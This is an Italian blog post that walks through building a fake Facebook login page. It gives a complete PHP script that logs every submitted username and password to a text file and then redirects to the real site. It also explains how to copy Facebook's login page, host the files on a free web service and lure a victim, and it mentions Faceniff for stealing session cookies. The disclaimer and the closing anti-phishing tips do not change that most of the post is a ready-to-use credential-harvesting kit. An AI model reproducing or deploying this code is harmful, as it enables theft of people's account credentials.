Fake login da remoto con un server FTP

Fake login da remoto con un server FTP

Facebook è sicuramente il social network più famoso, ma è anche quello meno sicuro. Infatti di default i pacchetti che viaggiano tra il PC e i server in California non viaggiano in HTTPS, ma semplicemente in HTTP. Questo “insicurezza” la si può facilmente notare con programmi come Faceniff, che permettono di intercettare i cookie del dispositivo del malcapitato di turno e sarà possibile entrare nella sua via “virtuale”. Un altro metodo che mette in pericolo Facebook è il fake login. Esso non è altro che un metodo di rubare, ovviamente illegalmente, le password, attraverso la creazione di pagina simile a quella originale, in cui la vittima inserisci il nome utente e la password, che però vengono salvati in file, che il criminale di turno più leggere e quindi scovare le credenziali d’accesso. La guida che sta per seguire è volta solamente è dimostrare su come sia facile effettuare un fake login e  non si incentiva nessuno ad utilizzare per rubare le password di amici, poichè un reato penale perseguibile dalle legge.

Come creare un fake login per Facebook 

Il primo passo è quello di scaricare da internet un file contenente una copia della struttura della pagina di Facebook. Per esempio da questo link. Tuttavia, conviene crearsi da soli i file. Per farlo basta creare un file post.php con scritto:

<?php
header (‘Location:http://it-it.facebook.com/’);
$handle = fopen(“leggimi.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Per trovare la vera e propria struttura, occorre aprire la pagina di login di Facebook e attraverso, per esempio Google Chrome, copiarsi la pagina e salvare il file in index.html.

Ora occorre creasi uno spazio WEB. Per esempio si può usare utilizzare http://it.altervista.org/.

Una vota creato lo spazio web, occorre caricare i file in una cartella, per esempio facebook. Una volta effettuato il caricamento, basta “solo” cercare il modo di far aprire alla vittima il link che abbiamo creato. Un’esempio del risultato finale è http://francy700.altervista.org/facebook/index.html Ovviamente non inserite le password qui ! Per vedere le credenziali d’accesso, occorre aprire il file leggimi.txt, presente nella cartella che abbiamo creato precedentemente.

Consigli per non cadere in un fake login

  1. Diffidare di aprire link sospetti che provengono anche da Amici
  2. Controllare nella barra degli indirizzi che si stia effettivamente navigando sul sito di facebook
  3. Abilitare il protocollo HTTPS dalle impostazioni di Facebook
  4. Se sei sempre il 1.000.000 cliente nei banner, non pensare di essere così fortunato. Molto probabilmente è una truffa fatta per rubare le due credenziali.
  5. In caso di furti di password, cercare di cambiarla immediatamente e fare la denuncia alla polizia postale.

Blogger

2 pensieri su “Fake login da remoto con un server FTP

I commenti sono chiusi.